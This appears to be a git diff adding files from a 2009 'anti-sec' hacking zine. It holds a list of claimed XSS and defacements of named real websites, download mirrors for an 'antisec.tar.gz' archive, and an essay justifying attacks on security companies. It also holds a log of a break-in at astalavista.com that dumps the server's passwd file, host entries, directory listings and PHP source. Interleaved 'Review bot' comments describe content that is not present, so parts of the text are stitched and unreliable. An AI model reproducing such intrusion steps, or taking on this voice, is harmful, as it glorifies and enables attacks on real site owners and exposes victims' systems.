+07/01/08	RoMeO	qhost.eu			7969095	XSS	mirror
+05/01/08	RoMeO	www.lpbs.org.uk			2776181	XSS	mirror
+04/01/08	RoMeO	www.tdxp.net			0	XSS	mirror
+26/12/07	RoMeO	aljaras.com			53022	XSS	mirror
+16/12/07	RoMeO	www.sitemaps101.com		2163273	XSS	mirror
+15/12/07	RoMeO	www.xml-sitemaps.com		8847	XSS	mirror
+10/12/07	RoMeO	www.phpfaber.com		437969	XSS	mirror
+04/12/07	RoMeO	www.tis-edu.com			0	XSS	mirror
+29/11/07	RoMeO	pwnstarz.com			2025995	XSS	mirror
+23/11/07	RoMeO	www.gamesurge.net		101368	XSS	mirror
+23/11/07	RoMeO	cityguide.aol.com		54	XSS	mirror
+21/11/07	RoMeO	my.notnet.co.uk			1419849	XSS	mirror
+06/11/07	RoMeO	kwikhost.com			3593939	XSS	mirror
+06/11/07	RoMeO	my.aol.com			54	XSS	mirror
+06/11/07	RoMeO	www.searchtons.com		145218	XSS	mirror
+05/11/07	RoMeO	www.seologs.com			18186	XSS	mirror
+05/11/07	RoMeO	tools.elitehackers.info		151229	XSS	mirror
+05/11/07	RoMeO	gallery.particlesoft.net	364744	XSS	mirror
+04/11/07	RoMeO	www.filecart.com		27636	XSS	mirror
+04/11/07	RoMeO	chollotenis.com			0	XSS	mirror
+02/11/07	RoMeO	tsdepot.co.uk	R		6739237	XSS	mirror
+02/11/07	RoMeO	www.pesladder.com		1172005	XSS	mirror
+31/10/07	RoMeO	www.omni-chat.com		1857220	XSS	mirror
+28/10/07	RoMeO	www.anafit.com			2563280	XSS	mirror
+28/10/07	RoMeO	www.hellboundhackers.org	213995	XSS	mirror
+28/10/07	RoMeO	www.cyclelogic.co.uk		3361622	XSS	mirror
+16/10/07	RoMeO	tsdepot.co.uk			6739237	XSS	mirror
+06/10/07	RoMeO	www.terrytrophy.com		0	XSS	mirror
+03/10/07	RoMeO	www13.cd-wow.com		28971	XSS	mirror
+03/10/07	RoMeO	www.drbeat.li			8200365	XSS	mirror
+02/10/07	RoMeO	services.embark.com		12027	XSS	mirror
+27/09/07	RoMeO	ascii.techhappens.com		1215439	XSS	mirror
+20/09/07	RoMeO	www.org-rc.fr			1884591	XSS	mirror
+26/06/07	RoMeO	search.fbi.gov			11963	XSS	mirror
+
+
+2) http://www.zone-h.org/archive/defacer=romeo
+
+Time  		Attacker  	H  	M  	R  	Domain  		OS  		View
+2007/11/06 	Romeo 	H 				trakyagirl.uni.cc 	Win 2003 	mirror
+2007/09/23 	RomeO 	H 		R 		www.zexir.tk 	Linux 	mirror
+2006/12/11 	RoMeO 					www.koturkiye.com/hacked 	Linux 	mirror
+2006/10/21 	ROMEO 	H 				www.duyguajans.com 	FreeBSD 	mirror
+2006/09/06 	romeo 		M 			www.yeniliman.com/forum 	Linux 	mirror
+2006/09/06 	romeo 		M 			www.genc4um.com/forum 	Linux 	mirror
+2006/09/06 	ROMEO 	H 				www.forumhersey.com 	Linux 	mirror
+2006/09/05 	ROMEO 		M 			www.muzikogretmenleri.com/foru... 	Linux 	mirror
+2006/09/05 	ROMEO 		M 			www.sanalailem.com/forum 	Linux 	mirror
+2006/09/05 	ROMEO 					rocksitesi.net/forum/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 					www.beyazrenkler.com/forum/ind... 	Linux 	mirror
+2006/09/05 	ROMEO 					www.yasakmp3.com/forum/index.php 	Win 2003 	mirror
+2006/09/05 	ROMEO 					www.forumekani.com/index.php 	Linux 	mirror
+2006/09/05 	romeo 					www.turkfr.com/index.php 	Linux 	mirror
+2006/09/05 	romeo 					www.gizemliforum.org/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 					www.arkadasbilisim.com/forum/i... 	Linux 	mirror
+2006/09/05 	ROMEO 					www.modifiyedunyasi.com/forum/... 	Linux 	mirror
+2006/09/05 	ROMEO 					www.forzatc.net/forum/index.php 	FreeBSD 	mirror
+2006/09/05 	ROMEO 					www.megaarsiv.net/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 					egeizmir.com/forum/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 			R 		www.nokiacep.com/forum/index.php 	Win 2003 	mirror
+2006/09/04 	romeo 	H 				www.cyber-turka.org 	Win 2003 	mirror
+2006/07/12 	romeo 					www.cehennem.net/den 	Linux 	mirror
+2006/05/29 	romeo 	H 				gorno-altaisk.ru 	Linux 	mirror
+2006/05/29 	ROMEO 	H 	M 			www.nobel.uz 	Win 2000 	mirror
+2006/05/29  	ROMEO  	H  	 	R  	 	www.tdshi.uz  	Win 2000  	mirror
+2006/05/17 	romeo 	H 				forumliontr.com 	Linux 	mirror
+2006/05/02 	romeo 		M 			www.pichiz.biz/forum 	Linux 	mirror
+2006/05/02 	ROMEO 		M 			www.trmizah.com/smf 	Linux 	mirror
+2006/05/02 	ROMEO 	H 	M 			www.rapsohbeti.com 	Linux 	mirror
+2006/04/23 	romeo 					www.gecelerinforumu.com/forum/... 	Linux 	mirror
+2006/03/19 	romeo 					www.esmer.org/index.php 	Linux 	mirror
+2006/01/12 	romeo 		M 			sitebirligi.com/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			konya-kosk.bel.tr/~oyuncu/hack... 	Linux 	mirror
+2006/01/12 	romeo 		M 			aktueldershanesi.com/~oyuncu/h... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.hesapliweb.com/~oyuncu/hac... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.aheninsaat.com/~oyuncu/hac... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.mp3ilahi.com/~oyuncu/hacke... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.eurotipsters.com/~oyuncu/h... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.kardeslik.org/~oyuncu/hack... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.hiperx.net/~oyuncu/hacked/... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.najans.com/~oyuncu/hacked/... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.gulmece.net/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.cigilfm.com/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.gifturk.com/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.why-islam.net/~oyuncu/hack... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.e-matrak.org/~oyuncu/hacke... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.kazancyolu.com/~oyuncu/hac... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.hiperstore.gen.tr/~oyuncu/... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.senarslan.com/~oyuncu/hack... 	Linux 	mirror
+2006/01/12  	romeo  	 	M  	 	 	www.aprohosting.net/~oyuncu//h...  	Linux  	mirror
+2006/01/12 	romeo 		M 	R 		www.gulum.net/~oyuncu//hacked/... 	Linux 	mirror
+2006/01/12 	romeo 		M 	R 		www.basinyayin.net/~oyuncu//ha... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.dinleradyo.com/~oyuncu//ha... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.sitetasarimi.com/~oyuncu//... 	Linux 	mirror
+2005/04/08 	romeo 					votedevoe.org/v-web/portal/cms... 	FreeBSD 	mirror
+2005/03/23 	romeo 			R 		www.willowsend.co.nz/index.php 	Linux 	mirror
+2005/03/23 	romeo 	H 	M 			moh.theclap.co.nz 	Linux 	mirror
+
+
+_______          ___________   
+\   _  \ ___  __/_   \   _  \  
+/  /_\  \\  \/  /|   /  /_\  \ 
+\  \_/   \>    < |   \  \_/   \
+ \_____  /__/\_ \|___|\_____  /
+       \/      \/           \/ 
+__________                             __  .__                
+\______   \ ____ ______   ____________/  |_|__| ____    ____  
+ |       _// __ \\____ \ /  _ \_  __ \   __\  |/    \  / ___\ 
+ |    |   \  ___/|  |_> >  <_> )  | \/|  | |  |   |  \/ /_/  >
+ |____|_  /\___  >   __/ \____/|__|   |__| |__|___|  /\___  / 
+        \/     \/|__|                              \//_____/  
+
+
+1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
+2) http://www.fbi.gov/contact/fo/fo.htm
+3) http://www.treas.gov/usss/index.shtml
+4) http://www.ic3.gov/default.aspx
+5) http://www.tra.gov.ae/complaints.php
+
+
+_______          ____ ____ 
+\   _  \ ___  __/_   /_   |
+/  /_\  \\  \/  /|   ||   |
+\  \_/   \>    < |   ||   |
+ \_____  /__/\_ \|___||___|
+       \/      \/          
+   _____   __    __                .__                           __          
+  /  _  \_/  |__/  |______    ____ |  |__   _____   ____   _____/  |_  ______
+ /  /_\  \   __\   __\__  \ _/ ___\|  |  \ /     \_/ __ \ /    \   __\/  ___/
+/    |    \  |  |  |  / __ \\  \___|   Y  \  Y Y  \  ___/|   |  \  |  \___ \ 
+\____|__  /__|  |__| (____  /\___  >___|  /__|_|  /\___  >___|  /__| /____  >
+        \/                \/     \/     \/      \/     \/     \/          \/ 
+
+Mirrors
+
+1. http://rapidshare.com/files/328431323/antisec.tar.gz
+2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
+3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
+4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
+5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
+6. http://www.sendspace.com/file/07clr5
+
+
+_______          ____________  
+\   _  \ ___  __/_   \_____  \ 
+/  /_\  \\  \/  /|   |/  ____/ 
+\  \_/   \>    < |   /       \ 
+ \_____  /__/\_ \|___\_______ \
+       \/      \/            \/
+_________                      .__               .__               
+\_   ___ \  ____   ____   ____ |  |  __ __  _____|__| ____   ____  
+/    \  \/ /  _ \ /    \_/ ___\|  | |  |  \/  ___/  |/  _ \ /    \ 
+\     \___(  <_> )   |  \  \___|  |_|  |  /\___ \|  (  <_> )   |  \
+ \______  /\____/|___|  /\___  >____/____//____  >__|\____/|___|  /
+        \/            \/     \/                \/               \/ 
+
+What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of 
+becoming an integral part of the information security industry and so they are blaming people who share old 
+and new information regarding the protection of corporate and personal information assets, including ICT systems 
+and social security.
+
+_______          ____________  
+\   _  \ ___  __/_   \_____  \ 
+/  /_\  \\  \/  /|   | _(__  < 
+\  \_/   \>    < |   |/       \
+ \_____  /__/\_ \|___/______  /
+       \/      \/           \/ 
+  ________                      __          
+ /  _____/______   ____   _____/  |_________
+/   \  __\_  __ \_/ __ \_/ __ \   __\___   /
+\    \_\  \  | \/\  ___/\  ___/|  |  /    / 
+ \______  /__|    \___  >\___  >__| /_____ \
+        \/            \/     \/           \/
+
+We want to thank the following people for their contribution. You know who you are!
+Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors
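Review bot: the annotated disassembly in this file is imported truncated: its last comment line ends at `for(ai=0;ai` with the loop bound missing, which suggests that everything from a `<` onward was dropped by whatever tool produced this copy, so the text should be compared against a known-good copy of the zine before it is committed as a mirror. The `HOOKIN: root:123!"£` line also carries a non-ASCII character, so the file's encoding should be stated (for example in `.gitattributes`), otherwise the line will render differently from client to client. It would also help to add a line to the README saying that the captured-credential lines and the file-sharing links under "Mirrors" are reproduced verbatim as historical text and are neither maintained nor vetted.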
diff --git a/anti-sec/astalavista-comments.txt b/anti-sec/astalavista-comments.txt
new file mode 100644
index 0000000..a507bec
--- /dev/null
+++ b/anti-sec/astalavista-comments.txt
@@ -0,0 +1,136 @@
+
+	We have all seen the latest anti-sec hacks. We've been reading the comments and wanted to address a few of you.
+
+
+>> [ ProducedRaw ]
+>> I disagree. The guys they are targeting are blackhats and so they chose to be in the line of fire. It's like freaking out over a soldier getting shot.
+
+While you are right about them being in the line of fire by their own will, you
+are dead wrong about who these people are. Sometimes we have to remind ourselves
+about how ignorant the public is, due in full by the people getting paid to lie.
+
+You will be spared hearing about the long, long history behind hacking. This
+stuff is set-in-stone and there's not much people can do to argue for or against
+these definitions.
+
+Whitehat:    asshole who publicly posts exploits, tools, etc. normally sucks
+             dick for money (do you actually need a citation or have we shared
+	     enough?)
+Greyhat:     no such fucking thing
+Blackhat:    someone who is hacking and not posting shit public. But there's a
+             HUGE difference between the blackhat hacking scene and the
+	     underground. That's a long story though.
+
+Therefore, it's safe to say that this Astalavista cult and the rest of their
+sheep followers (no offense to sheep) are FAR from being blackhats or even
+respectable and intelligent "computer scientists" or whatever the fuck they feel
+like calling themselves.
+
+Why? Not only do they sit and run ./nmap and think they're badass but they
+MIRROR EXPLOITS that are publicly available and sell them. They make a living
+off of public and FREE information. They provide little kids with copy-and-paste
+tutorials on how to launch attacks with those scripts/tools/exploits too.
+
+But then they offer security solutions to another company... do you see what's
+going on here? They cause a problem, and provide (commercially) a fix for it.
+Hell, they can't even apply those patches to their own servers!
+
+>> [ illuminatedwax ]
+>> See I don't see a problem with getting hacked if people are using 0days on software that you haven't personally created. 
+>> That's just the way things are. But in this case apparently they stole some passwords from his Gmail account. That's fucking stupid.
+
+You are missing the point. If you're running a security website / company and at
+the same time you can't even secure your own god damn workspace, website, or
+server and you save plaintext passwords in databases, you deserve to be rm'd.
+
+It doesn't even matter if they were stolen passwords from the gmail account
+(they weren't). He should have been much smarter than that. He has an IT CV so
+big and a mouth even bigger yet he gets owned. There are no excuses and no
+conditions.
+
+>> [ xb4r7x ]
+>> lmao... that guy really needs to lay off the caps lock.
+>> [EDIT]: I was going to go on an anti-sec rant... but I have a call to go on. Will post when I'm back at my desk.
+>> [EDIT2]: Here's my opinion on anti-sec groups. If any of you belong to these groups, which I'm sure at least some of you do... 
+>> pay close attention to this, then look at yourself in the mirror. You'll thank me later.
+>> Black hats are people who sit in their basement on a computer with the lights off with the sole purpose of breaking into systems and causing mayhem. 
+>> Why? Well nobody really knows... but it's similar to a kid with a magnifying glass near an ant hill. 
+>> They generally lack social skills and for whatever reason don't want to develop them by going outside and enjoying the world. 
+>> They take pleasure in other people's pain, and have massive inferiority complexes.
+>> This is the main reason they do what they do IMO... they can't make friends like everyone else, feel inferior, 
+>> and need to prove to themselves that they're better than others. So they break into other people's computer systems to prove that they're better. 
+>> When really, they're just assholes with no life.
+>> There is another type of black hat as well... and they're just sadistic bastards with few redeeming qualities.
+>> Dear BH's Make the world a better place... don't try to destroy it just to see what happens. Nothing you've ever done, 
+>> or ever will do will keep people from living their lives. You're all cockroaches.
+>> 
+>> In all honesty, you can forget everything I just said... 
+>> I just have a serious problem with people who fuck with other people for what seems like no reason. Especially when they hide behind the internet.
+>> Oh yeah, and they're cry babies. "WAAAHHH DON'T TELL PEOPLE THEIR SHIT IS BROKEN!! THEN THEY'LL FIX IT AND I CAN'T ATTACK THEM ANYMORE!!!" - Idiots
+
+You have the general media image of a "blackhat", carved into your thoughts by
+the very people that we've exposed time and time again. The security industry
+has no facts to back up on their talk, and nor do you.
+
+Take a good look at the people getting pwned by the blackhats and the
+underground. It wasn't this way a long time ago, but you will notice that these
+days a good majority are promoting an industry and skewed culture which they
+are unable to learn from and apply to their own servers. They are hypocrites.
+
+There is some more terminology that we have to clear up.
+
+Hackers:   THEY HACK SHIT. They are not necessarily programmers that broke their
+           etch-a-sketches apart when they were 5 years old and inhaled the
+	   powder.
+Crackers - Reverse engineers, not "hackers who use the information for
+           destruction".
+
+Anything else is a fucking lie and anyone who believes it is taking it up the
+ass by not only the security industry but the whitehats that use stereotypes to
+enhance their own image and get them jobs.
+
+Now, when you look at all of the kids running rampant hacking random places with
+no skills at all, how are they obtaining the tools to do it? Sites like
+Astalavista and people like Glafkos ( nowayout ).
+
+Now do you see why we target these people? It's not about telling people, "your
+shit is broken," it is about ZERO DISCLOSURE of exploits to the general public.
+
+If you don't follow that, then you are contributing to the security industry and
+making a lot of fucktards money they do not deserve because they obtain it
+through lying and scaring people into using their products.
+
+This diagram will help demonstrate:
+
+[ Full-Disclosure ] ----> milw0rm / websites that mirror milw0rm / publish exploits / copy-and-paste tutorials ---> script kiddies with no clue on why / how said script 
+works,
+	but they do have a tutorial to follow, line by line ---> companies and people getting hacked / destroyed.
+	
+What are blackhats doing exactly?
+
+Hacking and exposing the websites / people who are promoting those exploits to the public, selling a service that they cannot provide, lying and cheating... 
+Hence why blackhats are against full disclosure Maybe a few good things do happen from full disclosure, but on the bigger picture it's mostly bad.
+
+>> [ xb4r7x ]
+>> Idc how much of an idiot the guy was for not securing his data. Hacking his box is still wrong... even if he did ask for it.
+>> It bothers me that people do this shit just to prove that they can.
+>> Although I was mildly amused that pretty early on in the list of emails they had detected the 'script kiddies'... but still did nothing to keep them out.
+
+If he was your average joe with no security on his data, it would have been all fine, but this guy actually says he is a security expert, his CV mentions 5+ certificates.
+
+This was not to prove they can, but more like to expose those people who claim they are security experts, claim they are whitehats... while it didnt take much effort to 
+break
+into there servers, find exploits, milw0rm mirrors, bad code, etc...
+
+>> [ chia_pet ]
+>> Wow. What a bunch of asshats. What's so horrifically wrong about publishing information that could lead to more security?
+
+Read above, you miss the point.. It is not against the security, it is against the security industry.
+
+>> [ benologist ]
+>> Who cares if they were profiting? Why are we against everyone but ourselves making money?
+
+It is more about how they were profiting, 
+disclosing exploits to the public then offering security against the huge threat of "hackers".. while they couldn't secure there own servers / scripts.
+
+
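Review bot: five lines inside this hunk have no leading `+` (`works,`, the tab-indented `but they do have a tutorial to follow, line by line ...` line and the tab-only line after it, `break`, and `into there servers, find exploits, ...`), yet the header `@@ -0,0 +1,136 @@` only adds up to 136 if those lines are counted as additions, so the patch as posted will not apply. The marker appears to have been lost after the diff was generated; resend the output of `git format-patch` unmodified (as an attachment or through `git send-email`) so that every added line keeps its `+`.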
diff --git a/anti-sec/astalavista.txt b/anti-sec/astalavista.txt
new file mode 100644
index 0000000..b5f13e4
--- /dev/null
+++ b/anti-sec/astalavista.txt
@@ -0,0 +1,1983 @@
+
+   _____    _________________________  .____       _________   ____.___  _________________________   
+  /  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \  
+ /  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \ 
+/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
+\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
+        \/        \/                 \/        \/       \/                     \/                 \/ 
+                                  The Hacking & Security Community
+ [+] Founded in 1997 by a hacker computer enthusiast
+ [-] Exposed in 2009 by anti-sec group
+
+From < http://astalavista.com/faq>:
+>> 03. Who's behind the site?
+>>
+>> A team of security and IT professionals, and a countless number of contributors from all over the world.
+
+>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
+>>
+>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and 
+military institutions. 
+>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
+
+Why has Astalavista been targeted?
+
+Other than the fact that they are not doing any of this for the "community" but
+for the money, they spread exploits for kids, claim to be a security community
+(with no real sense of security on their own servers), and they charge you $6.66
+per months to access a dead forum with a directory filled with public releases
+and outdated / broken services.
+
+We wanted to see how good that "team of security and IT professionals" really is.
+
+Let's begin.
+
+anti-sec:~# ./g0tshell astalavista.com -p 80
+	[+] Connecting to astalavista.com:80
+	[+] Grabbing banner...
+		LiteSpeed
+	[+] Injecting shellcode...
+	[-] Wait for it
+	
+	[~] We g0tshell
+		uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+		ID: uid=100(apache) gid=500(apache) groups=500(apache)
+	
+sh-3.2$ cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+named:x:25:25:Named:/var/named:/sbin/nologin
+apache:x:100:500::/var/www:/bin/false
+diradmin:x:101:101::/usr/local/directadmin:/bin/bash
+mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+webapps:x:500:501::/var/www/html:/bin/bash
+majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
+admin:x:501:502::/home/admin:/bin/bash
+jon:x:502:503::/home/jon:/bin/bash
+com:x:503:504::/home/com:/bin/bash
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
+astanet:x:504:505::/home/astanet:/bin/bash
+avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+
+sh-3.2$ cat /etc/hosts
+# Do not remove the following line, or various programs
+# that require network functionality will fail.
+127.0.0.1       localhost.localdomain   localhost
+::1     localhost6.localdomain6 localhost6
+80.74.154.172           asta1.astalavistaserver.com
+
+sh-3.2$ pwd
+/home/com/public_html
+
+sh-3.2$ ls -la
+total 18460
+drwxr-xr-x 30 com apache     4096 May 28 17:06 .
+drwx--x--x 11 com com        4096 Jun 25  2008 ..
+drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
+drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
+drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
+drwxrwxrwx  2 com com        4096 May 19 00:50 config
+drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
+drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
+drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
+drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
+drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
+-rw-r--r--  1 com com        8035 May 19 14:26 directory_to_mediadir.php
+drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
+drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
+-rw-r--r--  1 com com        3750 Feb 27 16:12 favicon.ico
+drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
+-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
+-rw-r--r--  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
+-rw-r--r--  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
+drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
+drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
+-rw-r--r--  1 com com       97496 Jun  2 13:01 index.php
+drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
+drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
+drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
+drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
+drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
+drwxr-xr-x 34 com com        4096 May 28 16:30 modules
+drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
+drwxrwxr-x 22 com com        4096 May 28 17:06 _new
+drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
+drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
+drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
+-rw-r--r--  1 com com          26 Feb  2 19:33 robots.txt
+-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
+-rw-r--r--  1 com com         223 Mar 30 15:32 test.php
+drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
+drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
+drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
+
+sh-3.2$ head -20 index.php
+
+
+sh-3.2$ cd modifications/
+sh-3.2$ ls -la
+total 32
+drwxr-xr-x  8 com com    4096 May 11 12:48 .
+drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
+drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
+drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
+drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
+drwxr-xr-x  2 com com    4096 Feb  2 19:33 search
+drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
+
+sh-3.2$ ls -R
+.:
+com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
+
+./com_avtng:
+avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
+
+./com_avtng/scripts:
+popunder.js
+
+./cronjobs:
+exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
+
+./cronjobs/tmp:
+contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
+
+./onlinetools:
+index.php
+
+./pjirc:
+a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
+AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
+background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
+
+./pjirc/img:
+ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
+arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif    
+verre-eau.gif
+argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif   
+verre-vin.gif
+ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
+biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
+
+./pjirc/snd:
+bell2.au  ding.au
+
+./search:
+searchEngines.php  search.php
+
+./_tmp:
+defaultPorts.php  defaultPorts.txt
+
+sh-3.2$ cd cronjobs/
+sh-3.2$ cat exploits.php
+[snip]
+$categories   = array();
+$milw0rmFile  = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
+$expolits     = file($milw0rmFile);
+$comExploits  = array();
+[snip]
+// manage data
+for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+
+    // get path and title
+    $expolits[$x] = trim($expolits[$x]);
+    $path         = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
+    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
+
+    // check if file exists
+    if (file_exists($path)) {
+
+        $text = file_get_contents($path);
+
+        // get content and date
+        //$text = htmlspecialchars($text, ENT_QUOTES);
+        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, "UTF-8"));
+        if ($tmptext != '') {
+            $text = $tmptext;
+        } else {
+            $text = addslashes(htmlentities($text,  ENT_QUOTES));
+        }
+        $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
+        $tmp  = explode('-', $date);
+        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
+        $cat  = getCategory ($path);
+        $ext  = pathinfo(basename($path));
+        $ext  = $ext['extension'];
+        $qStr = "
+            SELECT  `id`
+            FROM    `contrexx_module_exploits`
+            WHERE   `title`  =  '" . $title . "'
+            AND     `date`   =  '" . $date . "'
+        ";
+        echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
+        $q = $_objDB->query($qStr);
+
+        if ($q->numRows() == 0) {
+
+            // prepare array
+            $comExploits[$x]['date']      = $date;
+            $comExploits[$x]['title']     = $title;
